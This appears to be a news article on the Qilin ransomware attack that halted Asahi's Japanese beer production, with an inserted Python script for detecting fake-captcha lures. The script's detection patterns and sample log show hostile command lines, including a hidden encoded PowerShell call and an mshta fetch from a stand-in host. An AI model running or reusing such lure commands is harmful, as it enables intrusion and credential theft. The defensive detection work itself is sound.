Getting a beer has been difficult for days in the world's fourth-largest economy, and Japanese bars, restaurants and liquor stores have had a rough start to October. Asahi beer, the most consumed in the country with a 40% market share, has been in short supply for two weeks because of a cyber attack that paralyzed its production and shipments. Competitors such as Kirin and Sapporo, in turn, could not keep up and had to stop accepting orders from establishments looking for an alternative brand.
On September 29, a ransomware attack claimed by the Russian Qilin group forced the company to close six breweries and 30 other plants. Attacks of this type use malicious programs that encrypt files and lock systems until a ransom is paid. With its computers paralyzed, the company temporarily fell back on manual processes to manage orders and logistics: for two weeks everything was handled with pen and paper, with customers notified by fax when the trucks were ready to leave the warehouse.
The incident made it physically impossible to handle the usual flow of goods in time, and it took only two days for store shelves to run out of stock. The same happened in the hospitality sector: soon the Japanese's favorite beer was no longer being served. Even Asahi's headquarters could not receive e-mail, as the company itself reported, and the presentation of its quarterly results had to be postponed.
The business recovered little by little, starting with the group's flagship Super Dry brand, until on October 10 all plants were operating again, albeit at reduced capacity. The company has not yet confirmed that it is back to normal. “I would like to express my sincere apologies for any distress caused to our stakeholders by the recent system outage. We appreciate your understanding and support,” Atsushi Katsuki, the group's president, said in a statement.
The Asahi group produces beer, but also soft drinks, food and spirits. The cyber attack hit Japan but not Europe, where the group owns drink brands such as Peroni, Pilsner Urquell, Grolsch and Fuller's. Losses from the production stoppage are estimated at approximately $335 million. Some 27 gigabytes of data, approximately 9,300 files, were stolen, including financial and budget documents, confidential contracts, planning and development forecasts and internal reports, as well as employees' personal information. The Qilin group posted a few of them on the dark web as a sample.
Fake Captcha
How did the hackers manage to leave Japan without beer? “The attackers conducted a very sophisticated campaign, in which a Linux variant of the ransomware infected Windows systems using legitimate remote network management tools,” explains David Sancho, senior threat researcher at Trend Micro. They got into the brewery's network using fake captchas, the mechanisms that test users, for example by asking them to pick the photos in which a car appears, to prove they are not bots. When employees clicked on the boxes of those captchas, which appeared on the computers of key Asahi staff, “a piece of malware was installed which stole network passwords, allowing them to be used for the rest of the attack. During this period, backups and disaster recovery systems became unusable,” adds Sancho.
Once inside the systems, the attackers searched undetected for sensitive data to exfiltrate and encrypt. Once the data was downloaded, they locked the machines and demanded a ransom. But the extortion is twofold. “Investigators who had private conversations with Qilin operators found that, in addition to demanding a ransom, they also attempted to sell the stolen data to Asahi for $10 million. This request was received on October 11, likely as a tactic to cut out intermediaries and accelerate pressure on the victim,” notes Nethaniel Ribco, global cyber threat manager at UST CyberProof.
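The article says only that fake captchas appeared on key employees' machines and that clicking them installed credential-stealing malware; it does not describe the delivery chain. What a defender can act on is the moment such a lure pays off: a web browser, or the Windows shell after the user is talked into running something, launching a script host with arguments that hide the window, decode an embedded payload or fetch a second stage. The following Python sketch is an added example, not code from Asahi, Trend Micro or Qilin and not drawn from the incident itself; the log format, hostnames, usernames, paths and command lines are constructed for illustration, and the process names and argument patterns are assumptions about the general lure type rather than facts reported about this attack.

```python
import re
from dataclasses import dataclass

# All names below are illustrative assumptions for the example, not tooling
# from the Asahi incident or from Qilin.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# Arguments typical of a one-liner that hides its window, decodes an
# embedded payload or fetches a second stage from the web.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|"
    r"downloadstring|invoke-webrequest|https?://)",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    ts: str
    host: str
    user: str
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one pipe-delimited process-creation record.

    Field order (a constructed format for this example, not a real product's):
    timestamp|host|user|parent_image|image|command_line
    """
    fields = line.rstrip("\n").split("|", 5)
    if len(fields) != 6:
        raise ValueError(f"malformed record: {line!r}")
    ts, host, user, parent, image, cmdline = fields
    return ProcessEvent(ts, host, user, parent.lower(), image.lower(), cmdline)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like a fake-captcha lure paying off.

    An empty list means the event is not flagged. explorer.exe launching
    PowerShell on its own is routine and is only flagged when the command
    line itself looks malicious.
    """
    reasons: list[str] = []
    child, parent = _basename(ev.image), _basename(ev.parent)
    if child not in SCRIPT_HOSTS:
        return reasons
    if parent in BROWSERS:
        reasons.append(f"browser {parent} spawned script host {child}")
    if SUSPICIOUS_ARGS.search(ev.cmdline):
        reasons.append("command line hides its window, decodes a payload or fetches from the web")
    return reasons


def detect(lines) -> list[dict]:
    """Run score_event over raw log lines and collect the flagged ones."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            alerts.append({"ts": ev.ts, "host": ev.host, "user": ev.user,
                           "image": _basename(ev.image), "reasons": reasons})
    return alerts


# Constructed sample records: two benign, three that should fire.
SAMPLE_LOG = r"""
2025-09-29T08:12:03Z|wks-17|corp\jdoe|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA
2025-09-29T08:13:10Z|wks-21|corp\mkim|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -File C:\scripts\disk-report.ps1
2025-09-29T08:14:55Z|wks-21|corp\mkim|C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta https://verify.example.invalid/check.hta
2025-09-29T08:15:02Z|wks-17|corp\jdoe|C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|C:\Windows\System32\notepad.exe|notepad.exe invoice.txt
2025-09-29T08:16:40Z|wks-17|corp\jdoe|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Windows\System32\cmd.exe|cmd /c echo ok
""".strip().splitlines()


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert["ts"], alert["host"], alert["user"], alert["image"],
              "; ".join(alert["reasons"]))
```

To use it on a real feed, replace SAMPLE_LOG with process-creation telemetry (Sysmon event ID 1 or an EDR's equivalent) mapped into the six fields. Expect tuning: developers and administrators also launch shells from browser download prompts, so the browser-parent rule alone is a lead, while a browser parent combined with a hidden, encoded or downloading command line is the combination worth paging on.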
The Qilin group takes its name from a Chinese mythological creature wreathed in flames, with the body of a lion, fish scales and deer antlers. But it is not an Asian organization. The fact that its code is written in Russian and that its affiliates' attacks avoid targets in the Commonwealth of Independent States points to a Russian origin. “There are several clues suggesting that it has some kind of relationship with other Russian cybercriminal groups such as Scattered Spider or with North Korean groups,” says Josep Albors, director of research and outreach at cybersecurity firm ESET Spain.
Before the attack on Asahi, its biggest victim had been the British medical company Synnovis, which provides diagnostic and pathology services to several London hospitals, in June 2024. The group demanded a $50 million ransom not to publish the 400 gigabytes of data it had stolen. The attack caused the cancellation of more than 6,000 medical appointments and a shortage of blood donations.
The industrialization of “ransomware”
There is something that sets Qilin apart from other cybercriminal groups: it offers its malware to any hacker who manages to get into a company's network, and then splits the ransom obtained. “It provides affiliates with all the tools and infrastructure needed to launch attacks and, in exchange, pockets between 15% and 20% of the ransoms paid,” says Eusebio Nieva, Check Point's technical director for Spain and Portugal.
Giving those who can open a company's door the tools to steal what is inside, much as one hires a plumber or a lawyer, lets the ransomware business industrialize and scale. “They operate under a model that we call Ransomware as a Service,” stresses Sancho of Trend Micro, the lab that discovered the group in August 2022.
This operating model has turned Qilin into a major international ransomware threat. In the third quarter of 2025 it accounted for at least 402 successful attacks, 21% of the total, according to Trend Micro's data. “Qilin is one of the most active groups today. Among its strengths, it is a multiplatform ransomware: besides Windows systems, attacks on Linux servers have also been observed. It also has quite a reputation for exploiting vulnerabilities in network devices such as routers or firewalls,” Albors of ESET stresses.
Another of the group's strengths is that, so far, it has been very elusive. “Qilin's infrastructure is designed to resist takedowns: it keeps its leak sites and command-and-control servers on bulletproof hosting services, often in countries that do not cooperate with investigations,” says Hervé Lambert, global head of consumer operations at Panda Security.
